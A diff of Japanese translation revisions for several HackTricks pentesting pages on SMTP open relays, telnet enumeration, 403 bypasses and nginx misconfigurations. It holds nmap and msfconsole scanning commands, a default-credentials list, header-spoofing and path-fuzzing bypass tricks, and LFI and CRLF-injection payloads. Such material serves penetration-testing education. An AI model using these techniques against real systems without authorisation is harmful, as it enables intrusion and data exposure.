**こちらから** [**参照**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)**。**\
**こちら** [**から**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)**。**\
メールを送信する各サブドメインに対して、別々のSPFレコードを持つ必要があります。\
以下は、以前openspf.orgに投稿されたもので、この種の情報にとって素晴らしいリソースでした。
以下は、元々openspf.orgに投稿されたもので、こういった情報のための素晴らしいリソースでした。
> デーモンの質問: サブドメインについてはどうですか
> デーモンの質問: サブドメインについては?
>
> pielovers.demon.co.ukからメールを受け取った場合、pieloversのSPFデータがない場合、1つ上のレベルに戻ってdemon.co.ukのSPFをテストすべきですか いいえ。Demonの各サブドメインは異なる顧客であり、各顧客は独自のポリシーを持っている可能性があります。Demonのポリシーがデフォルトで全顧客に適用されるのは理にかなりません。Demonがそれを望む場合、各サブドメインのためにSPFレコードを設定できます。
> pielovers.demon.co.ukからメールを受け取った場合、pieloversのSPFデータがない場合、1つ上のレベルに戻ってdemon.co.ukのSPFをテストすべきですか いいえ。Demonの各サブドメインは異なる顧客であり、各顧客は独自のポリシーを持っている可能性があります。Demonのポリシーがデフォルトで全ての顧客に適用されるのは理にかなりません。Demonがそれを望む場合、各サブドメインのためにSPFレコードを設定できます。
>
> したがって、SPF発行者へのアドバイスは次のとおりです: AまたはMXレコードを持つ各サブドメインまたはホスト名に対してSPFレコードを追加する必要があります。
> したがって、SPF発行者へのアドバイスは次のとおりです: AまたはMXレコードを持つ各サブドメインまたはホスト名に対してSPFレコードを追加するべきです。
>
> ワイルドカードAまたはMXレコードを持つサイトは、次の形式のワイルドカードSPFレコードも持つべきです: \* IN TXT "v=spf1 -all"
@ -377,13 +377,13 @@ _dmarc.bing.com. 3600 IN TXT "v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMA
### **オープンリレー**
メールが送信される際、スパムとしてフラグが立てられないようにすることが重要です。これは、**受信者によって信頼されるリレーサーバーを使用することで達成されることが多い**です。しかし、一般的な課題は、管理者がどの**IP範囲が許可されるべきかを完全に理解していない可能性があることです**。この理解の欠如は、SMTPサーバーの設定におけるミスを引き起こし、セキュリティ評価で頻繁に特定されるリスクとなります。
メールが送信される際、スパムとしてフラグが立てられないようにすることが重要です。これは、**受信者によって信頼されるリレーサーバー**を使用することで達成されることが多いです。しかし、一般的な課題は、管理者がどの**IP範囲が許可されるべきかを完全に理解していない**ことです。この理解の欠如は、SMTPサーバーの設定におけるミスを引き起こし、セキュリティ評価で頻繁に指摘されるリスクとなります。
特に潜在的または進行中のクライアントとの通信に関して、メール配信の問題を回避するために、一部の管理者が使用する回避策は、**任意のIPアドレスからの接続を許可することです**。これは、SMTPサーバーの`mynetworks`パラメータをすべてのIPアドレスを受け入れるように設定することで行われます。
特に潜在的または進行中のクライアントとの通信に関して、メール配信の問題を回避するために、一部の管理者が使用する回避策は、**任意のIPアドレスからの接続を許可すること**です。これは、SMTPサーバーの`mynetworks`パラメータをすべてのIPアドレスを受け入れるように設定することで行われます。
```bash
mynetworks = 0.0.0.0/0
```
メールサーバーがオープンリレーであるかどうかを確認するために(これは外部ソースからのメールを転送できることを意味します)、`nmap`ツールが一般的に使用されます。これをテストするために設計された特定のスクリプトが含まれています。サーバー例えば、IP 10.10.10.10でポート25を使用して`nmap`で詳細スキャンを実行するためのコマンドは次のとおりです:
メールサーバーがオープンリレーであるかどうかを確認するために(これは外部ソースからのメールを転送できることを意味します)、`nmap`ツールが一般的に使用されます。これをテストするために設計された特定のスクリプトが含まれています。`nmap`を使用してポート25でサーバー例えば、IP 10.10.10.10)に対して詳細スキャンを実行するコマンドは次のとおりです:
```bash
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
```
@ -499,7 +499,7 @@ s.sendmail(sender, [destination], msg_data)
### **More info**
**これらの保護に関する詳細情報は** [**https://seanthegeek.net/459/demystifying-dmarc/**](https://seanthegeek.net/459/demystifying-dmarc/) **で見つけてください。**
**これらの保護に関する詳細情報は** [**https://seanthegeek.net/459/demystifying-dmarc/**](https://seanthegeek.net/459/demystifying-dmarc/) **で確認できます。**
### **Other phishing indicators**
@ -508,8 +508,8 @@ s.sendmail(sender, [destination], msg_data)
* リンク操作技術
* 疑わしい(一般的でない)添付ファイル
* 壊れたメールコンテンツ
* メールヘッダーの値と異なる値の使用
* 有効で信頼されたSSL証明書の存在
* メールヘッダーと異なる値の使用
* 有効で信頼できるSSL証明書の存在
* ウェブコンテンツフィルタリングサイトへのページの提出
## Exfiltration through SMTP
@ -583,9 +583,9 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'
```
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すために、カスタムツール、検出および悪用モジュールを開発します。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼ら深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すために、カスタムツール、検出および悪用モジュールを開発します。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -599,7 +599,7 @@ GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
</details>
{% endhint %}

View file

@ -9,13 +9,13 @@ GCPハッキングを学び、実践する: <img src="/.gitbook/assets/grte.png"
<summary>HackTricksをサポートする</summary>
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
@ -24,22 +24,22 @@ GCPハッキングを学び、実践する: <img src="/.gitbook/assets/grte.png"
**コマンドの出典:** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/)
**HELO**\
最初のSMTPコマンドです: 送信者サーバーを識別して会話を開始し、一般的にはそのドメイン名が続きます。
最初のSMTPコマンドです送信者サーバーを識別して会話を開始し、一般的にはそのドメイン名が続きます。
**EHLO**\
会話を開始するための代替コマンドで、サーバーが拡張SMTPプロトコルを使用していることを示します。
**MAIL FROM**\
このSMTPコマンドで操作が始まります: 送信者は「From」フィールドにソースメールアドレスを記載し、実際にメール転送を開始します。
このSMTPコマンドで操作が始まります送信者は「From」フィールドにソースメールアドレスを記載し、実際にメール転送を開始します。
**RCPT TO**\
メールの受信者を特定します; 受信者が複数いる場合は、コマンドが単にアドレスごとに繰り返されます。
メールの受信者を特定します;複数ある場合は、コマンドを単にアドレスごとに繰り返します。
**SIZE**\
このSMTPコマンドは、添付されたメールの推定サイズバイト単位をリモートサーバーに通知します。また、サーバーが受け入れるメッセージの最大サイズを報告するためにも使用できます。
**DATA**\
DATAコマンドでメールの内容の転送が始まります; 一般的には、サーバーからの354応答コードが続き、実際の転送を開始する許可が与えられます。
DATAコマンドでメールの内容の転送が始まります一般的には、実際の転送を開始する許可を与える354の応答コードがサーバーから返されます。
**VRFY**\
特定のメールアドレスまたはユーザー名が実際に存在するかどうかを確認するようサーバーに要求します。
@ -48,7 +48,7 @@ DATAコマンドでメールの内容の転送が始まります; 一般的に
このコマンドは、クライアントとサーバーの役割を反転させるために使用され、新しい接続を実行する必要はありません。
**AUTH**\
AUTHコマンドを使用して、クライアントはサーバーに対して自分自身を認証し、ユーザー名とパスワードを提供します。これは、適切な転送を保証するためのもう一つのセキュリティ層です。
AUTHコマンドを使用して、クライアントはサーバーに対して自分自身を認証し、ユーザー名とパスワードを提供します。これは、適切な転送を保証するためののセキュリティ層です。
**RSET**\
進行中のメール転送が終了することをサーバーに通知しますが、SMTP会話は終了しませんQUITの場合のように
@ -62,7 +62,7 @@ AUTHコマンドを使用して、クライアントはサーバーに対して
**QUIT**\
SMTP会話を終了します。
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
@ -77,7 +77,7 @@ GCPハッキングを学び、実践する: <img src="/.gitbook/assets/grte.png"
<summary>HackTricksをサポートする</summary>
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
</details>

View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまでの機能を提供します。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
@ -39,11 +39,11 @@ nc -vn <IP> 23
```bash
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
```
スクリプト `telnet-ntlm-info.nse` は NTLM 情報 (Windows バージョン) を取得します。
The script `telnet-ntlm-info.nse` は NTLM 情報 (Windows バージョン) を取得します。
[telnet RFC](https://datatracker.ietf.org/doc/html/rfc854) から: TELNET プロトコルには、ユーザーとサーバーが TELNET 接続のためにより複雑な (または単に異なる) 一連の規約を使用することに合意できるようにするために、"**DO, DON'T, WILL, WON'T**" 構造使用されるさまざまな "**options**" があります。このようなオプションには、文字セットの変更、エコーモードの変更などが含まれる可能性があります。
[telnet RFC](https://datatracker.ietf.org/doc/html/rfc854) から: TELNET プロトコルには、ユーザーとサーバーが TELNET 接続のためにより複雑な (または単に異なる) 一連の規約を使用することに合意できるようにするために、"**DO, DON'T, WILL, WON'T**" 構造と共に使用されるさまざまな "**options**" があります。これらのオプションには、文字セットの変更、エコーモードの変更などが含まれる可能性があります。
**このオプションを列挙することが可能であることは知っていますが、方法がわからないので、知っている場合は教えてください。**
**このオプションを列挙することが可能であることは知っていますが、方法がわからないので、知っているは教えてください。**
### [ブルートフォース](../generic-methodologies-and-resources/brute-force.md#telnet)
@ -85,9 +85,9 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'
```
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまで対応しています。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すために、カスタムツール、検出およびエクスプロイトモジュールを開発しています。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまで対応しています。私たちはペンテスターを置き換えるのではなく、彼ら深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すために、カスタムツール、検出およびエクスプロイトモジュールを開発しています。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -101,7 +101,7 @@ GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **ハッキングトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
* **ハッキングトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>
{% endhint %}

View file

@ -10,14 +10,14 @@ GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **ハッキングトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
* **ハッキングトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを送信してください。**
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発しています。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむためのカスタムツール、検出および悪用モジュールを開発しています。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -25,15 +25,15 @@ GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png
ファイルにアクセスするために**異なる動詞**を使用してみてください:`GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK`
* レスポンスヘッダーを確認してください。情報が提供されるかもしれません。例えば、**HEAD**に対する**200レスポンス**が`Content-Length: 55`の場合、**HEAD動詞が情報にアクセスできる**ことを意味します。しかし、その情報を抽出する方法を見つける必要があります。
* レスポンスヘッダーを確認してください。おそらくいくつかの情報が提供されるかもしれません。例えば、**HEAD**に対する**200レスポンス**が`Content-Length: 55`の場合、**HEAD動詞が情報にアクセスできる**ことを意味します。しかし、その情報を抽出する方法を見つける必要があります。
* `X-HTTP-Method-Override: PUT`のようなHTTPヘッダーを使用すると、使用される動詞を上書きできます。
* **`TRACE`**動詞を使用し、運が良ければ、レスポンスに**中間プロキシによって追加されたヘッダー**が表示されるかもしれません。
## HTTPヘッダーのファジング
* **Hostヘッダーを**任意の値に変更す[ここで機能した](https://medium.com/@sechunter/exploiting-admin-panel-like-a-boss-fc2dd2499d31)
* リソースにアクセスするために[**他のユーザーエージェントを使用する**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt)。
* **HTTPヘッダーをファジングする**HTTPプロキシ**ヘッダー**、HTTP認証ベーシックおよびNTLMブルートフォースいくつかの組み合わせのみおよび他の技術を試してください。これを行うために、[**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass)というツールを作成しました。
* **Hostヘッダーを**任意の値に変更します([ここで機能した](https://medium.com/@sechunter/exploiting-admin-panel-like-a-boss-fc2dd2499d31)
* リソースにアクセスするために[**他のユーザーエージェントを使用してみてください**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt)。
* **HTTPヘッダーをファジングする**HTTPプロキシ**ヘッダー**、HTTP認証ベーシックおよびNTLMブルートフォースいくつかの組み合わせのみやその他の技術を試してください。これを行うために、私は[**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass)というツールを作成しました。
* `X-Originating-IP: 127.0.0.1`
* `X-Forwarded-For: 127.0.0.1`
@ -53,14 +53,14 @@ GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png
* `X-Original-URL: /admin/console`
* `X-Rewrite-URL: /admin/console`
* ページが**プロキシの背後にある**場合、プライベート情報へのアクセスを妨げているのはプロキシかもしれません。[**HTTPリクエストスムージング**](../../pentesting-web/http-request-smuggling/)**または**[**ホップバイホップヘッダー**](../../pentesting-web/abusing-hop-by-hop-headers.md)**を悪用してみてください。**
* 異なるレスポンスを探して[**特別なHTTPヘッダー**](special-http-headers.md)をファジングしてください
* **HTTPメソッドをファジングしながら特別なHTTPヘッダーをファジングしてください**。
* ページが**プロキシの背後にある**場合、プライベート情報へのアクセスを妨げているのはプロキシかもしれません。[**HTTPリクエストスムージング**](../../pentesting-web/http-request-smuggling/)**または**[**hop-by-hopヘッダー**](../../pentesting-web/abusing-hop-by-hop-headers.md)**を悪用してみてください。**
* 異なるレスポンスを探して[**特別なHTTPヘッダーをファジング**](special-http-headers.md)します
* **HTTPメソッドをファジングしながら特別なHTTPヘッダーをファジングします**。
* **Hostヘッダーを削除すると、保護をバイパスできるかもしれません**
## パス**ファジング**
_/path_がブロックされている場合
もし_/path_がブロックされている場合
* _**/**_**%2e/pathを使用してみてくださいアクセスがプロキシによってブロックされている場合、これが保護をバイパスする可能性があります。また、**\_\*\* /%252e\*\*/pathダブルURLエンコードを試してください**
* **Unicodeバイパスを試してください**_/**%ef%bc%8f**path_URLエンコードされた文字は「/」のようなものですので、再エンコードすると_//path_になり、すでに_/path_の名前チェックをバイパスしているかもしれません。
@ -91,30 +91,30 @@ _/path_がブロックされている場合
## **パラメータ操作**
* **param値を変更する****`id=123` --> `id=124`**
* URLに追加のパラメータを追加する`?`**`id=124` —-> `id=124&isAdmin=true`**
* パラメータを削除する
* パラメータの順序を変更する
* 特殊文字を使用する
* パラメータで境界テストを実行する — _-234_や_0_や_99999999_のような値を提供す(いくつかの例値)。
* **パラメータ値を変更****`id=123` --> `id=124`**
* URLに追加のパラメータを追加`?`**`id=124` —-> `id=124&isAdmin=true`**
* パラメータを削除
* パラメータの順序を変更
* 特殊文字を使用。
* パラメータで境界テストを実 — _-234_や_0_や_99999999_のような値を提供します(いくつかの例値)。
## **プロトコルバージョン**
HTTP/1.1を使用している場合、**1.0を使用してみてください**、または**2.0をサポートしているかテストしてください**。
HTTP/1.1を使用している場合、**1.0を使用してみてください**、または**2.0をサポートしているかテストしてみてください**。
## **その他のバイパス**
* ドメインの**IP**または**CNAME**を取得し、**直接連絡してみてください**。
* 一般的なGETリクエストを送信して**サーバーにストレスをかけてみてください**[この人がFacebookで成功した](https://medium.com/@amineaboud/story-of-a-weird-vulnerability-i-found-on-facebook-fc0875eb5125))。
* **プロトコルを変更する**httpからhttpsへ、またはhttpsからhttpへ
* **プロトコルを変更**httpからhttpsへ、またはhttpsからhttpへ
* [**https://archive.org/web/**](https://archive.org/web/)にアクセスし、過去にそのファイルが**全世界からアクセス可能だったかどうかを確認してください**。
## **ブルートフォース**
* **パスワードを推測する**:次の一般的な資格情報をテストします。被害者について何か知っていますかそれともCTFチャレンジ名ですか
* **パスワードを推測**:以下の一般的な認証情報をテストします。被害者について何か知っていますかそれともCTFチャレンジ名ですか
* [**ブルートフォース**](../../generic-methodologies-and-resources/brute-force.md#http-brute)**基本、ダイジェスト、NTLM認証を試してください。**
{% code title="一般的な資格情報" %}
{% code title="一般的な認証情報" %}
```
admin admin
admin password
@ -136,9 +136,9 @@ guest guest
* [Forbidden Buster](https://github.com/Sn1r/Forbidden-Buster)
* [NoMoreForbidden](https://github.com/akinerk/NoMoreForbidden)
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポート作成まで対応しています。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すために、カスタムツール、検出および悪用モジュールを開発しています。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すために、カスタムツール、検出および悪用モジュールを開発します。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -152,7 +152,7 @@ GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>
{% endhint %}

View file

@ -15,9 +15,9 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまでの機能を提供します。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すために、カスタムツール、検出およびエクスプロイトモジュールを開発します。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまでの機能を提供します。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -34,19 +34,19 @@ proxy_pass http://127.0.0.1:8080/;
}
}
```
この設定では、`/etc/nginx` がルートディレクトリとして指定されています。このセットアップにより、`/hello.txt` のような指定されたルートディレクトリ内のファイルにアクセスできます。しかし、特定の場所(`/hello.txt`)のみが定義されていることに注意することが重要です。ルートロケーション(`location / {...}`)の設定はありません。この省略により、ルートディレクティブはグローバルに適用され、ルートパス `/` へのリクエストが `/etc/nginx` の下のファイルにアクセスできるようになります。
この構成では、`/etc/nginx` がルートディレクトリとして指定されています。この設定により、`/hello.txt` のような指定されたルートディレクトリ内のファイルにアクセスできます。ただし、特定の場所(`/hello.txt`)のみが定義されていることに注意することが重要です。ルートの場所(`location / {...}`)に関する設定はありません。この省略により、ルートディレクティブはグローバルに適用され、ルートパス `/` へのリクエストが `/etc/nginx` の下のファイルにアクセスできるようになります。
この設定から生じる重要なセキュリティ上の考慮事項があります。`GET /nginx.conf` のような単純な `GET` リクエストは、`/etc/nginx/nginx.conf` にある Nginx 設定ファイルを提供すること、機密情報を露出させる可能性があります。ルートを `/etc` のようなあまり機密性の高くないディレクトリに設定することで、このリスクを軽減できますが、それでも他の重要なファイル、他の設定ファイル、アクセスログ、さらには HTTP ベーシック認証に使用される暗号化された資格情報への意図しないアクセスを許可する可能性があります。
この構成から生じる重要なセキュリティ上の考慮事項があります。`GET /nginx.conf` のような単純な `GET` リクエストは、`/etc/nginx/nginx.conf` にある Nginx 設定ファイルを提供することによって、機密情報を露出させる可能性があります。ルートを `/etc` のようなあまり機密性の高くないディレクトリに設定することで、このリスクを軽減できますが、それでも他の重要なファイル、他の設定ファイル、アクセスログ、さらには HTTP ベーシック認証に使用される暗号化された資格情報への意図しないアクセスを許可する可能性があります。
## Alias LFI Misconfiguration <a href="#alias-lfi-misconfiguration" id="alias-lfi-misconfiguration"></a>
Nginx の設定ファイルでは、「location」ディレクティブを注意深く検査する必要があります。Local File Inclusion (LFI) として知られる脆弱性は、以下のような設定を通じて意図せず導入される可能性があります。
Nginx の設定ファイルでは、「location」ディレクティブを注意深く検査する必要があります。Local File Inclusion (LFI) として知られる脆弱性は、次のような構成を通じて意図せず導入される可能性があります:
```
location /imgs {
alias /path/images/;
}
```
この設定は、サーバーが `/imgs../flag.txt` のようなリクエストを意図しないディレクトリの外にあるファイルにアクセスしようとする試みとして解釈するため、LFI攻撃に対して脆弱です。これは実際には `/path/images/../flag.txt` に解決されます。この欠陥により、攻撃者はウェブを介してアクセスできるべきではないサーバーのファイルシステムからファイルを取得できます。
この設定は、サーバーが `/imgs../flag.txt` のようなリクエストを意図しないディレクトリ外のファイルにアクセスしようとする試みとして解釈するため、LFI攻撃に対して脆弱です。これは実際には `/path/images/../flag.txt` に解決されます。この欠陥により、攻撃者はウェブを介してアクセスできるべきではないサーバーのファイルシステムからファイルを取得できます。
この脆弱性を軽減するために、設定を次のように調整する必要があります:
```
@ -100,7 +100,7 @@ location / {
return 302 https://example.com$uri;
}
```
HTTPリクエストにおいて、文字 \r (キャリッジリターン) と \n (ラインフィード) は新しい行の文字を示し、そのURLエンコード形式は `%0d%0a` として表されます。これらの文字をリクエストに含めること(例: `http://localhost/%0d%0aDetectify:%20clrf`)は、誤って設定されたサーバーに対して行うと、サーバーが `Detectify` という新しいヘッダーを発行します。これは、$uri 変数がURLエンコードされた新しい行の文字をデコードするため、レスポンスに予期しないヘッダーが含まれることになります:
